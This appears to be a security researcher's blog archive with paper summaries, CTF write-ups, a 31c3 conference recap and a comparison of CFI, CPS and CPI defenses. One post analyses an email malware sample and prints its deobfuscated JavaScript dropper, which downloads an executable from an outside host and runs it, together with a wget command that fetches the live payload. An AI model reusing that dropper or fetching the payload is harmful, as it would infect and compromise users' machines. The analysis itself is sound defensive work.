One of the questions I had was how severe the changes on the underlying architecture are given that a lot of additional information needs to be tracked. As I'm not working close to the hardware I cannot assess the likelihood of such a mechanism to succeed but I found the discussion and approach of implementing such a defense mechanism in hardware interesting. On more general terms, it would be interesting to see how (small) ISA extensions could significantly reduce the performance overhead of defense mechanisms. E.g., a generic two-level lookup for metadata (similar to a page table lookup) as used by, e.g., binary translators, meta data managers, and other mechanisms would significantly improve many defense mechanisms, yet still stay generic enough to allow different mechanisms to compete.

Data-Oriented Programming: On the Expressiveness of Non-Control Data Attacks

We have known that data-oriented attacks are powerful for a while. Last year we have published Control-Flow Bending and more recently there was Control Jujutsu, both papers looking at different forms of data-oriented attacks that allow Turing-complete computation. Control-Flow Bending is a more general approach that requires (lots of) human analysis while Control Jujutsu would allow for more automation.

In this paper, Hong Hu, Shweta Shinde, Adrian Sendroiu, Zheng Leong Chua, Prateek Saxena, and Zhenkai Liang look at more powerful automation of data-oriented attacks. The authors build an attack by evaluating the program and finding a path through the program that does not change control-flow explicitly but implicitly. Instead of corrupting code pointers, they use memory safety violations to steer execution to arbitrary computation. This is an interesting paper that shows how far we can (currently) scale automatic analysis before we run into state explosions. Future research will look at finding better heuristics to tune the search, hopefully restricting the search space so that more powerful adversarial programs can be engineered.

Dedup Est Machina: Memory Deduplication as an Advanced Exploitation Vector

This was a simple, yet beautiful paper by Erik Bosman, Kaveh Razavi, Herbert Bos, and Cristiano Giuffrida that combines memory deduplication to leak memory secrets and rowhammer to escalate privileges. In a first step, the authors use memory dedupllication available in Windows 10 to leak ASLR base addresses. Memory deduplication merges equal pages across processes. Writing to a page triggers a copy-on-write which the attacker can user as a side channel. See our earlier paper on CAIN for more details. In a second step, they use rowhammer to toggle "god mode" in Internet Explorer, allowing the malicious JavaScript to escape the sandbox.

LAVA: Large-scale Automated Vulnerability Addition

The LAVA paper by Dolan-Gavitt, Patrick Hulin, Engin Kirda, Tim Leek, Andrea Mambretti, Wil Robertson, Frederick Ulrich, and Ryan Whelan discusses a large-scale framework to evaluate and test defense mechanisms. Evaluating defense mechanisms based on a large scale corpus is a hard problem. This paper proposes an automated framework that leverages dynamic taint analysis to automatically generate test cases with vulnerabilities from benign programs. These test cases can then be used to test defense mechanisms and let defense mechanisms compete against each others. Defense mechanisms can be dynamic, i.e., protecting against memory corruptions or type confusions at runtime) or static, i.e., finding vulnerabilities through static analysis at compile time.

Such a framework has long been overdue and it would allow us to let different mechanisms compete with each other, maybe even ranking different defense mechanisms in how well they protect against different forms of attack. The framework first generates a set of test cases based on a bug/error specification and then evaluates the different selected mechanisms against each other.

There are plans to open-source the framework and the data-set but due to corporate policies this will take more time.

Trend Micro CTF: base64 (crypto 500)

2015-09-26T12:00:00-04:00

Due to other commitments I only had little time to play during this CTF and when I arrived on Saturday (the 2nd day of the competition) our b01lers were already hacking away and we were hovering somewhere around 100.

For quite a while I looked trough some of the others and misc challenges but did not find a good angle. I then turned my attention to base64, a crypto 500 challenge that asked us to identify which letters cannot occur in base64 encoded strings whenever two strings overlap. The assumption was that two arbitrary input strings are encoded in base64 and we are supposed to figure out which letters cannot occur in both strings. The description was quite ambiguous and it took me some time to figure out that the two strings were just a red herring and that we only needed to find what characters cannot occur in base64 encoded strings if the input are "alphabetical" strings.

Base64 encoding maps 3 8 bit characters to 4 6 bit characters (24 bit each). This tells us that we will have to look at all 3 character combinations to figure out which characters are possible and which are not. I've hacked a quick python script to iterate through all 3 character combinations, reducing any resulting character from the initial set of base64 characters:

import base64

chars = ['0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']
sbase64 = ['0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z','A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z','+','/']
for i in chars:
    for j in chars:
        for k in chars:
            lst = i+j+k
            enc = base64.b64encode(lst)
            for l in enc:
                if l in sbase64:
                    sbase64.remove(l)
print sbase64

When we run the script it takes less than 0.3 seconds to return:

['7', 'f', '+', '/']

Which we have to lex-sort to submit the flag TMCTF{+/7f} and we receive 500 points for this 5 minute effort. Go b01lers!

CSAW: sharpturn

2015-09-19T12:00:00-04:00

For this challenge we were given a corrupted git repository. We started by checking out the git repository (using git clone) and checking the consistency of the repository (using git fsck):

Checking object directories: 100% (256/256), done.
error: sha1 mismatch 354ebf392533dce06174f9c8c093036c138935f3
error: 354ebf392533dce06174f9c8c093036c138935f3: object corrupt or missing
error: sha1 mismatch d961f81a588fcfd5e57bbea7e17ddae8a5e61333
error: d961f81a588fcfd5e57bbea7e17ddae8a5e61333: object corrupt or missing
error: sha1 mismatch f8d0839dd728cb9a723e32058dcc386070d5e3b5
error: f8d0839dd728cb9a723e32058dcc386070d5e3b5: object corrupt or missing
missing blob 354ebf392533dce06174f9c8c093036c138935f3
missing blob f8d0839dd728cb9a723e32058dcc386070d5e3b5
missing blob d961f81a588fcfd5e57bbea7e17ddae8a5e61333

The description of the challenge gives a hint and tells us that there is some corruption on the SATA side. The git object protocol stores the file and uses a sha1sum to generate a hash of the file.

In total there were three 1 byte changes (simple bit flips), one change for every wrong byte. Each commit need to be fixed and we wrote a small script that brute forces all bytes, replacing a byte with all possible alternatives.

The first error that needs to be replaced is: 51337 with 31337 (3 is flipped to 5, 2 bits change). The second error is the number that you have to factor for the challenge. There 270031727027 is used instead of 272031727027 (2 is flipped to 0, 1 bit changes). The last change is &lag is used instead of flag (changing f to &, 1 bit changes).

For each corruption we have to checkout (git checkout) the corrupt version and fix the sharp.cpp file. After fixing all prior errors we run our search program to find each of the changes mentioned above. The file can then be rehashed using git hash-object -w sharp.cpp and the object cache will be updated. Moving to the next corruption we can checkout corrupt version until we have iterated through all the errors.

When we are done we have to compile the challenge and pass the correct answers (flag, 31337, money, 31357, 8675311) and we get the flag. Hooray, 400 points for b01lers!

PLAID: pnguncorrupt

2015-04-18T02:00:00-04:00

We received a PNG file that got somehow corrupted in transit. Reading the PNG specification and looking at the first couple of bytes in the header we saw that an 0x0d byte was dropped. The file used 89 50 4e 47 0a 1a 0a as header instead of 89 50 4e 47 0d 0a 1a 0a. According to the PNG specification this is a feature to detect if the file was converted from lf/cr to cr or cr to lf/cr. Now if that's not a huge hint.

Ignoring the hint we badgered on and continued reading the PNG documentation and playing around with the PNG after fixing the header. PNG files consist of multiple chunks of different types. Each chunk consists of length (4b, big endian), chunk type (4b), data (len), CRC-32 (4b). Writing a parser we saw that the first couple of chunks were decoded just fine but then there was a bunch of IDAT chunks (that contain a deflate-encoded stream of data) that did not match up. The data was somewhat too short (shorter than the length description) and the following IDATs did not line up. We tried both padding the data section with additional 0x0 bytes and shortening the data sections but then the CRC-32 did no longer match. After we fixed the CRC-32 we got a deflate decode error (in the first IDAT chunk). Whenever decoding fails in a chunk, PNG readers give up as they can no longer resynchronize.

Oh well, back to square one. Let's look again at that PNG linefeed conversion thingy. After looking more closely we discovered that each chunk hat 0 to 3 bytes missing. Hm, this looks suspiciously like a Windows to Linux text format conversion and might tell us that the file was converted in error. An earlier internet search told us that it is impossible to undo this conversion (that's why we tried the other options first) but if you try hard it might be possible to recover.

So, firing up our Python skills we wrote a quick tool that parsers the PNG file, fixes header and copies all correct chunks. For incorrect chunks we extract the data and recursively try to find correct placements of 0x0d bytes. We walk through the data section and for every 0x0a byte we find, we try to place an 0x0d byte before it until the length matches. We then test the CRC-32 and if the CRC-32 now matches with the CRC-32 in the file we have successfully recovered the data of this one chunk. This recovery option only works if there are not too many 0x0d bytes that were removed from a specific chunk, otherwise the search space would explode. Even with only a couple of chunks that had 3 bytes missing the search took roughly 15 minutes on a fast desktop (well, maybe we should not have coded the search in Python).

Here's the recursive search function:

def find0a(buf, nra, crc, loc):
    ptr = string.find(buf, "\x0a", loc)
    while ptr != -1:
        fbuf = buf[0:ptr]
        fbuf = fbuf + "\x0d"
        fbuf = fbuf + buf[ptr:]
        if nra == 1:
            tcrc = binascii.crc32(fbuf) & 0xffffffff
            if tcrc == crc:
                print "Found a match: "+str(hex(tcrc))
                return fbuf
        else:
            tmp = find0a(fbuf, nra-1, crc, ptr+1)
            if tmp != "":
                return tmp
        ptr = string.find(buf, "\x0a", ptr+1)
    return ""

You can guess the remainder of the program (parsing the file format, then parsing each chunk, looking at the length and searching for the next chunk by guessing how many bytes are missing. In the end we received a nice Startcraft screenshot that told us the flag is flag{have_a_wonderful_starcrafts}. Hooray, 150 points!

0CTF: treasure

2015-03-30T02:00:00-04:00

We are told that there's a treasure waiting at treasure.ctf.0ops.sjtu.cn so we have to start digging!

Firing up dig: dig treasure.ctf.0ops.sjtu.cn -t ANY tells us that the target is a IPv6 address.

Let's do a traceroute to that address:

$ traceroute6 treasure.ctf.0ops.sjtu.cn
...
25  0000000110001101110000000 (2001:470:d:b28::14:2)  79.101 ms  78.517 ms  74.130 ms
26  0111110111100111110111110 (2001:470:d:b28::15:2)  79.776 ms  74.481 ms  79.247 ms
27  0100010110001100110100010 (2001:470:d:b28::16:2)  73.597 ms  78.433 ms  88.964 ms
28  0100010101000011010100010 (2001:470:d:b28::17:2)  89.942 ms  88.982 ms  89.823 ms
29  0100010101010101110100010 (2001:470:d:b28::18:2)  88.834 ms  89.702 ms  92.050 ms
30  0111110110011011010111110 (2001:470:d:b28::19:2)  91.862 ms  79.223 ms  79.132 ms

These look like bit patterns. But unfortunately traceroute stops after 30 hops. So let's resolve the remaining entries as well until we reach the target address (we see that linearly increasing pattern for the addresses).

Let's continue with the remaining IPv6 addresses using a reverse lookup using dig -x to the remaining addresses and we get the following bit patterns:

0000000110001101110000000 14
0111110111100111110111110 15
0100010110001100110100010 16
0100010101000011010100010 17
0100010101010101110100010 18
0111110110011011010111110 19
0000000101010101010000000 20
1111111110111100111111111 21
0011100010001010011100111 22
0100011011001101101000000 23
0101010000111110110010100 24
0011111011010110011010101 25
1001010100000111010010000 26
0001111100000101001010110 27
0110110100110010110100000 28
0100101001101111101000010 29
0110100101100000000001010 30
1111111100111011011101001 31
0000000101101110010101100 32
0111110101111100011100110 33
0100010110011010000001101 34
0100010111011101000011000 35
0100010110010110111010010 36
0111110100101111000010110 37
0000000100000010010100110 38

After unsuccessfully trying gazillion of 5, 6, and 8-bit encodings we saw a pattern: at the top left there's box of 1's (as at the lower left and upper right). So this actually looks like a QR code.

Dumping the bits into a file and hacking together a python script that generates an image allows us to decode the QR code using a mobile app and QR decoder. This results in the flag and 50 points.

Reversing JS email malware

2015-02-08T10:00:00-05:00

Another lazy Sunday (oh well, actually I should be writing papers and grant proposals but we are not talking about that right now) and I'm scrolling through my email when I stumbled upon a "FedEx notice" with your usual "you have not picked up your package" scam and I figured I'd give it a closer look.

Hm, a zip archive as attachment, now that's suspicious. Extracting this fancy file we see that it contains a 00000528789.doc.js file. Opening the JavaScript file it is somewhat obfuscated. Running it through a pretty printer, searching for the decode function (function jdb()) in this case) we get to the actual JavaScript code that would have been executed if I'd have been running a Windows machine, opened the ZIP archive and naively clicked on it:

function dl(fr, fn, rn) {
    var ws = new ActiveXObject("WScript.Shell");
    var fn = ws.ExpandEnvironmentStrings("%TEMP%") + String.fromCharCode(92) + fn;
    var xo = new ActiveXObject("MSXML2.XMLHTTP");
    xo.onreadystatechange = function() {
        if (xo.readyState === 4) {
            var xa = new ActiveXObject("ADODB.Stream");
            xa.open();
            xa.type = 1;
            xa.write(xo.ResponseBody);
            xa.position = 0;
            xa.saveToFile(fn, 2);
            xa.close();
        };
    };
    try {
        xo.open("GET", fr, false);
        xo.send();
        if (rn > 0) {
            ws.Run(fn, 0, 0);
        };
    } catch (er) {};
};
dl("http://eurotechgermancarservice.com/document.php?id=5452555E0905100C0D05174A14051D0116240A01060108130108104A0A0110&rnd=6442141", "65813032.exe", 1);

Well, this really looks like a dropper to me, let's grab that EXE and see what we find. And sadly the file is empty if we try to grab is via wget:

HTTP/1.1 200 OK
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sun, 08 Feb 2015 15:42:47 GMT
Content-Length: 0

Let's see if we can grab it by using a different User-Agent:

wget --user-agent="User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12" -c "http://eurotechgermancarservice.com/document.php?id=5452555E0905100C0D05174A14051D0116240A01060108130108104A0A0110&rnd=6442141"

Success! We get a 140KB executable that would have been downloaded from the JavaScript program and then executed.

My first hope was that the rnd parameter and the end of the string would be used for some explicit randomization to diversify the different binaries (as we proposed in SyScan and in our technical report). But the rnd parameter is only used as key, allowing the EXE download only if the key matches. I found some alternating keys that matched as well but all the executables had the same SHA hash.

Now, sending the file off to VirusTotal tells me that the sample I got is still fresh:

The code is stripped pei-i386 and uses a couple of Windows DLLs and seems to drop itself into VCjpeg.exe at one point in time. As I don't have a Windows machine to play around at the moment I'll leave it at that and close my investigation.

Addendum:

Looks like the file is changing and is being rediversified. Not using a given key but a new binary pops up every couple of minutes. So just wait for a while and you get a new sample (uploaded to VirusTotal: 1/56).

31c3 - A New Dawn

2014-12-30T16:00:00-05:00

Another year, another c3

This year marked my 11th year of congress (and 10th visit with a short hiatus in 2012). Just like all the years before we headed to the conference location a day before the start of the 31c3. After arriving in Hamburg (after a quick detour through the Lufthansa lounge in Frankfurt with super decent food) we checked in at the hostel and headed to the CCH, the conference location. After Lumi got her ticket we headed in and explored the assembly area where a lot of fancy stuff was already set up.

While there were tons of awesome art projects, old gaming machines, and other fancy decoration we felt that cozy seating areas were missing. In the last couple of years we loved to chill on the widely available couches. This year there were only few couches available and there was usually a super long wait to score some. But then again, the congress is facing exponential growth (Club of Rome anyone?) and it is now at more than 12,000 attendees (from around 3,000 attendees 4 years ago) and there's just not more space available.

The 5 talks I appreciated most are:

Iridium Pager Hacking -- Sec, schneider
Mining for Bugs with Graph Database Queries -- fabs
Thunderstrike: EFI bootkits for Apple MacBooks -- Trammell Hudson
The Perl Jam: Exploiting a 20 Year-old Vulnerability -- Netanel Rubin
Why are computers so @#!*, and what can we do about it? -- Peter Sewell
and obviously my talk on Code-Pointer Integrity...

Wir beteiligen uns aktiv an den Diskussionen -- Martin Haase

This was the first talk I watched and maha was awesome as always discussing fine lines of political arguments and how you can guide and lead the willing audience.

SCADA StrangeLove: Too Smart Grid in da Cloud -- Sergey Gordeychik, Aleksandr Timorin

From the soft skill talk by maha we moved on to a more technical talk about the continuously bad shape of SCADA system, including many nice details on their insecurities and how to pwn the systems.

Glitching For n00bs -- exide

Some details on voltage glitching, playing with frequency shifts, and so on the get around ROM limitations and force specific execution patterns. Nice introduction to glitching but nothing earth shattering.

Code Pointer Integrity -- gannimo

My talk on Code-Pointer Integrity, a defense mechanism we developed to protect low level code written in C or C++ against control-flow hijack attacks.

AMD x86 SMU firmware analysis -- Rudolf Marek

There are bugs in low level firmwares, who would have thought?

Crypto Tales from the Trenches

This panel lead by Nadia Heninger featured a bunch of journalists (Julia Angwin, Laura Poitras, Jack Gillum) and discussed how "real people" use crypto software to protect themselves against governmental spying.

Citizenfour -- Laura Poitras

If you haven't seen the movie about the Edward Snowden leaks and how they exchanged data. The movie sheds some more light on the person behind the leaks and discusses some of the motivations. Great movie, go watch it!

Mining for Bugs with Graph Database Queries -- fabs

Fabs rehashed his Oakland'14 talk and added a bunch of fresh VLC bugs and a longer discussion on the topic to make it more approachable to hackers. I really appreciate that he open-sourced the full framework and is super open to other hackers playing with his graph search database. The idea is that you have a super simple parser that churns through a bunch of code (without compiling it) pipes it into a graph database and allows you to query for specific patterns on a combined control-flow, program-dependence, and partial data-flow graph. Using all these combined graphs you can formulate super complex queries that hint at specific bugs and reduce the amount of code that you have to audit for 0days.

Fernvale: An Open Hardware and Software Platform, Based on the (nominally) Closed-Source MT6260 SoC -- bunnie, Xobs

Bunnie introduced their research engineering efforts into a super cheap ARM/GSM hardware project. The talk was awesome and it is best if you watch it and read his blog post

The Matter of Heartbleed -- Zakir Durumeric and Heartache and Heartbleed: The insider's perspective on the aftermath of Heartbleed -- Nick Sullivan

Awesome wrap up of heartbleed and how we analyzed and scanned a large part of the internet to ensure that people actually patch the vulnerability. Great super compact talk by Zakir and you might also want to read the paper.

Nick then discussed the CloudFlare challenge that they did but surprisingly he reformulated the challenge and presented CloudFlare in a much better light. CloudFlare challenged that hackers try to exploit the vulnerability and it sounded as if they were super sure that using their allocator made the vulnerability unexploitable while in the talk Nick presented it as a crowd-sourcing approach to find a working exploit. Anyways, the talk was interesting to follow and allowed closure on heartbleed.

Fnord News Show -- Frank, fefe

The Fnord news show was awesome as always. We enjoyed the show and -- as always -- were surprised by all the crap that happened during the year. It is sad with what kind of atrocities the politicians get away.

EMET 5.1 - Armor or Curtain? -- Rene Freingruber

Overview on EMET 5.1 and how you can break all defense mechanisms like ASLR, DEP, and different forms of canaries. The talk did not offer any surprises but it was nice to get an overview of the exploit techniques he used (ROPing and info-leaking away).

DP5: PIR for Privacy-preserving Presence -- Ian Goldberg, George Danezis, Nikita Borisov

Talk on how to use private information retrieval and how to connect anonymous (or semi-anonymous) entities for secure data exchange. This technique protects against graph similarities and breaking (pseudo-)anonymity by correlating social graphs.

Thunderstrike: EFI bootkits for Apple MacBooks -- Trammell Hudson

Exploiting and pwning the firmware of your MacBook using a 2 year old bug and a 20 year old legacy feature, connecting a malicious device to the Thunderbolt PCI bus, intercepting the boot process and injecting your own code into the firmware, circumventing all Apple verification. Existing devices will always be vulnerable to downgrade attacks, newer devices can be protected (by not exposing vulnerable older firmwares).

The Perl Jam: Exploiting a 20 Year-old Vulnerability -- Netanel Rubin

Awesome talk on lists in perl and how they can be used to overwrite arguments in functions when they are expanded. This is a must watch, part for the explicit language, the awesome camel pictures, and all the great WATs.

UNHash - Methods for better password cracking -- Tonimir Kisasondi

The search space for long passwords is huge, Tonimir looked at specific ways to guide the search to reap some low hanging fruits and find longer passwords faster. He looked at password leaks and came up with different form of combinations and how passwords are constructed from a human perspective, targeting such passwords using different word lists explicitly.

Infocalypse now: P0wning stuff is not enough -- Walter van Holst

Walter presented a very meta talk on the infocalypse.

Why are computers so @#!*, and what can we do about it? -- Peter Sewell

Awesome talk by Peter talking us on a wild ride through 60 years of abstractions in computer architecture, building layer upon layer of the software stack, featuring memory coherency questions and arguing in favor of verified interfaces. All layers should be verified, formally proven, and protected at all times. He is interested in coming up with formal descriptions of the interfaces that are amenable to testing and can actually be used in practice.

State of the Onion -- Jacob, arma

Jacob and arma present the current status of the Tor project, discuss the growth in bandwidth, governmental attacks, and other kind of quirks that the Tor project faces on a daily basis.

Missed talks

Due to overcrowding I was unable to watch the following talks. Of all the talks I heard great things and they are on my watch list for my next couple of flights:

Practical EMV PIN interception and fraud detection -- Andrea Barisani
Revisiting SSL/TLS Implementations -- Sebastian Schinzel
SS7: Locate. Track. Manipulate. -- Tobias Engel
ECCHacks -- djb, Tanja Lange
Beyond PNR: Exploring airline systems -- saper
Security Analysis of Estonia's Internet Voting System -- J. Alex Halderman
Preserving arcade games -- Ange Albertini
Attacks on UEFI security, inspired by Darth Venamis's misery and Speed Racer -- Rafal Wojtczuk, Corey Kallenberg
CAESAR and NORX -- Philipp Jovanovic, aumasson

Good bye 31c3

It was a pleasure, good bye Hamburg, and see you next year!

Ghost in the Shellcode Teaser 2015: Lost To Time

2014-12-13T19:39:00-05:00

We received a file that looked like it was compressed. Let's just pipe it through xz and see what it really is. Aaah, looks like some old and obscure machine code of a machine that has long since been retired.

The machine code is of the CDC 6600, a very weird machine that has a set of 24 registers, some of them address (A0-A7), index (B0-B1), and arithmetic registers (X0-X7). The ISA is kind of RISC like with some weird quirks.

The address width is 18 bit and there are 60 bits in a word (which is the access granularity). I'm not entirely sure on the endianness but it worked out either way.

Individual A and X registers are coupled, i.e., if something is written into A{1-5} then an implicit memory load to X{1-5} happens. A0 and X0 are scratch registers, B0 is hardwired to 0 (cheap bastards), B1 contains 1 by convention (seems like a waste of a register to me).

Interestingly the machine does not use ASCII characters but the following table:

XXX 000 001 010 011 100 101 110 111
000   :   A   B   C   D   E   F   G
001   H   I   J   K   L   M   N   O
010   P   Q   R   S   T   U   V   W
011   X   Y   Z   0   1   2   3   4
100   5   6   7   8   9   +   -   *
101   \   (   )   $   =       ,   .
110   #   [   ]   %   "   _   !   &
111   '   ?   <   >   @   \   ^   ;

When we start looking at the assembly code we see that there are two functions, CTF that initializes a set of registers and addresses and CTF2 which is basically a loop through the raw data region at the end of the file.

The initialization looks as follows:

CTF      BSS       0
         SB1       1                   B1 = 1
         SA1       CTFB                A1 = &CTFB, X1 = *CTFB
         BX6       X1                  X6 = X1
         SB7       27                  B7 = 27
         SA6       A1                  A6 = &CTFB, *CTFB = X6
         SA2       CTFA                A2 = &CTFA, X2 = *CTFA
         MX0       30                  X0 = 30 bit mask of 1 from top
         SA1       A2+B1               A1 = A2+1 = CTFA+1, X1= *(CTFA+1)

The CTF2 loop looks as follows:

CTF2     BX6       X0*X1               X6 = X0 AND X1 (clear lower 30bit)
         ZR        X6,CTF4             X6 = 0 ? CTF4
         JR        FCT                 call FCT
         SA6       A6+B1               A6 = A6 + 1; *(A6+1) = X6
         BX6       -X0*X1              X6 = -X0 AND X1 (inverted X0)
         ZR        X6,CTF4             X6 = 0 ? CTF4
         JR        FCT                 call FCT
         SA6       A6+B1               A6 = A6 + 1; *(A6+1) = X6
         SA1       A1+B1               A1 = A1 + 1; X1 = *(A1+1)
         NZ        X1,CTF2

CTF2 loads a word and processes the top 30 bits first and then the lower 30 bits. CTF2 then calls a subroutine that either just counts the number of bits for each half word or looks at the first word in the buffer and shifts it right to extract some part of special character for extra fun.

The FCT subroutine looks as follows:

FCT      SUBR
         CX6       X6                  X6 = number of 1's in X6
         SB6       X6                  B6 = X6
         LT        B6,B7,FCT2          B6 < B7? goto FCT2
         SB6       B6-B7               B6 = B6 - B7
         SB6       B6+B6               B6 = 2*B6 < 2 B6
         SB5       B6+B6               B5 = 2*B6 < 4 B6
         SB5       B5+B5               B5 = 2*B5 < 8 B6
         SB6       B5+B6               B6 = B5+B6 < 10 B6
         AX6       X2,B6               X6 = X2 >> B6
         MX7       -10                 X7 = 53 bit mask of 1 from top 110101=53
         BX6       -X7*X6              X6 = last 7 bits
FCT2     JP        FCTX

If the number of 1 bits in the 30 bit half word is lower than 27 then we just print the character. If it is 28 to 30 then we do (nrbits-27)*10 and shift the first word of memory that many bits to the right and then store it as character.

Note that the loop jumps over the first data word and starts processing from the 1st word on. But the 0 data word is used for the two parentheses ( ) in the flag.

So the algorithm is as follows: for each 60bit word, first look at the higher 30 bits, count the bits, use the lookup table above to encode the character. Then look at the lower 30 bit word, count bits and look up the character.

Now let's look at the data block:

0000000052 0244120057  3=C  9=I // 0 address, ignored
4021000310 0774415040  6=F 12=L
0000040000 0442211001  1=A  7=G
7777677777 0010002004 29=2=20; 520244>>2= 0.101.001_00 = 051 = ( 3=C
7737757761 0040000400 25=Y  2=B
0010020034 3556115671  5=E 18=R
0000000444 1625031752  3=C 15=O
6301523622 7165273762 14=N 20=T
2716771305 7111504353 18=R 15=O
1420532413 0006000100 12=L  3=C
6777567373 6000000000 25=Y  2=B
1000700020 4666666661  5=E 18=R
1001001001 0002000000  4=D  1=A
3567107765 0001000000 20=T  1=A
7000000000 7677737566  3=C 25=Y
4000000004 4000700004  2=B  5=E
5713542707 2000400010 18=R  3=C
5471065072 2667170671 15=O 18=R
3750335406 1653521704 16=P 15=O
6753156470 0000000004 18=R  1=A
1234567767 4127002011 20=T  9=I
2731534064 7003653700 15=O 14=N
77777777770000000000B 30=3=30; 052 = )
00000000000000000055B

And we get the flag FLAG(CYBERCONTROLCYBERDATACYBERCORPORATION)

You can find some more information at Wikipedia, ISA manual or Subroutines.

On differences between the CFI, CPS, and CPI properties

2014-10-07T14:09:00-04:00

At OSDI'14 we published our paper on [1] where we introduce two new security properties that protect programs against control-flow hijack attacks enabled by memory corruption vulnerabilities. The design space in this area is already very cluttered and we use this blog post to highlight the differences between the individual properties.

Some limitations of this post: we do not discuss actual implementations and vulnerabilities in these implementations but compare the properties itself (assuming the best implementation that is theoretically possible). Where we cite overhead numbers we will refer to strongest prototype implementations of the properties. This post is also limited in scope, for a complete overview of all defense mechanisms we refer to the Eternal War in Memory paper and /the related work section of our [1] paper.

Control-Flow Integrity (CFI)

The CFI property [2] ensures that the control-flow of the application stays within the control-flow graph, as determined ahead of execution. The original CFI paper, as well as many its follow-ups determine this CFG using static analysis. This analysis determines, for each indirect call site, a set of functions that can be called from that call site on any program execution. All indirect call sites are then instrumented with runtime checks to enforce that the function being actually called is one of the functions from the statically-determined set for that call site.

CFI does not prevent memory corruptions, instead it simply does a sanity check on function pointers before they're actually used. The original CFI paper also proposed to enforce the integrity of return addresses on the stack through the use of a shadow stack.

CFI Limitations

CFI restricts the set of targets to which an attacker might redirect the control-flow of a program, however, this set necessarily contains all functions that might be called at a given call site on any program execution, not just the current one.

To illustrate this, consider the classical callback function pattern. Say we have a Linux driver that installs a callback for a read() operation on the device file that it manages. The driver sets one of its functions as the callback upon its initialization, and the kernel will call this function whenever a read() operation on the corresponding device file is performed. Now, the indirect call instruction in the kernel that does this dispatch is the same for all drivers, so on different executions this instruction might call a callback from any driver. CFI can, at most, enforce that this instruction calls any callback for a read() operation from any driver. An attacker who can overwrite the callback pointer might set it to any function from the above set. If this call is followed by another indirect function call, an attacker might even setup a chain of functions to execute.

Unfortunately, there are further limitations in practice. Doing the above requires precise full-program static analysis: it must look at the entire kernel and all possible drivers that the kernel can ever load. This is hard in practice, and we are not aware of such analysis being ever done precisely on non-trivial systems (not to mention that it's also a theoretically undecidable problem). In practice, the CFI enforcement mechanism simply will not know which functions the dispatch instruction in the above example might call, so it will just enforce that it calls any valid function. This was the case for the original CFI implementation and, although the follow-up work can reduce this set in certain situations (such as virtual function calls), any CFI implementation we are aware of would have cases where this set contains almost every program function as well.

An potential attack against CFI mechanism was first introduced by Göktas et al. in the [3] paper that appeared at the Oakland'14 conference. The paper introduces several new types of gadgets (i.e., fragments of existing application code that might be reused by an attacker in a way that was not intended by the application), including call gadgets. Such gadgets start at a regular function prologue and end with an indirect function call, which enables to transfer control to the next gadget in the chain. The program might have enough variety of such linkable gadgets to perform meaningful computation: which is called a call-oriented programming (analogous to return-oriented programming, which similarly reuses gadgets that end with a return instruction). Göktas relied on a combination of call gadgets and other types of gadgets to mount a practical attack against a coarse-grained CFI implementation. This work can be generalized, for some programs, to bypasses a fine-grained CFI enforcement mechanism. We do have both simple and realistic examples of such programs. E.g., we where able to construct such an attack for the Perl interpreter (although, to be fair, we did not automate or weaponize the attack yet).

Code-Pointer Separation (CPS)

CPS prevents an attacker from forging a code pointer out of thin air. At most, an attacker can cause a program to call a function whose address was previously taken during current execution. In the above example of a Linux driver, the dispatch instruction can be potentially subverted to call, e.g., a valid callback function of a registered driver, but not a callback from a driver that is not registered on the current run of the kernel or a function that is never used as a callback.

Causing a program to call wrong function under CPS requires to (i) find an indirect function call that gets the pointer to be called through another level of indirection, e.g., struct_ptr->func_ptr() but not just func_ptr(); (ii) use a memory corruption to overwrite the pointer that is used to get the function pointer indirectly, e.g., struct_ptr, to a location that already contains a valid function pointer at a proper offset, and (iii) ensure that the program would not crash if the overwritten pointer, e.g., struct_ptr, is used after it was overwritten but before the function is called.

CPS ensures precise protection of the return address using safe stack: this address cannot be overwritten by the attacker in the first place. Moreover, the safe stack also protects all register spills as well as most of the local variables. The safe stack, as implemented for CPI and CPS, has much better performance characteristics than a shadow stack. For details, see our CPI paper.

Code-Pointer Integrity (CPI)

CPI enforces memory safety for all sensitive pointers, which include all code pointers (just as under CPS) but also all pointers that are used to access other sensitive pointers indirectly. All such pointers are protected through runtime memory safety checks. CPI guarantees that an attacker will not be able to use a memory corruption vulnerability in order to directly change the value of any sensitive pointer and cause the program to jump to a wrong location as a result. The only attack vector that remains open is data-based attacks, preventing those requires full memory safety.

In contrast to CFI, CPI does not execute any sanity checks on the code pointers before using them, but instead prevents an attacker from corrupting such pointers in the first place.

Property comparison

Let's compare the security CFI, CPS, and CPI security policies on several attack scenarios:

An attacker attempts to overwrite the return pointer on the stack:

CFI: the strong CFI, as introduced by Abadi et al., includes optional return address protection that is based on the shadow stack, which can prevent such attack. To the best of our knowledge, the shadow stack causes around 5% extra performance overhead on average, hence Abadi et al. made it optional. Many modern CFI solutions provide weaker return pointer protection for performance reasons.
CPS & CPI: the return address cannot be overwritten by a corrupt memory access through the safe stack, which has nearly zero performance overhead on average.

An attacker attempts to overwrite a code pointer stored in memory using memory corruption vulnerability:

CFI: the attacker may redirect the control-flow to any target in the set of targets permitted for the call site where the pointer is used. In practice, this set often includes every function in the program (as was the case for both the original CFI implementation and multiple follow-ups) or wide sets of functions (e.g., all functions with the same number of arguments). The most recent CFI implementation [4] reduces the size of these sets for virtual function calls in C++, but not generic indirect function calls.
CPS & CPI: code pointers cannot be overwritten by corrupt data pointer dereferences.

An attacker attempts to overwrite a data pointer that is used to access the code pointer indirectly (e.g., struct_ptr in struct_ptr->func_ptr()):

CFI: same limitations as above.
CPS: the attacker may redirect the control flow to any valid function whose address has already been taken during current execution and is still stored in the safe memory.
CPI: all such indirect pointers are protected and cannot be overwritten by a corrupt pointer dereferences.

An attacker attempts to change program data and cause it to take different execution path (e.g., by changing the decisions made in the if statements):

CFI: no guarantees
CPS: no guarantees
CPI: no guarantees, but some of the pointers are protected.

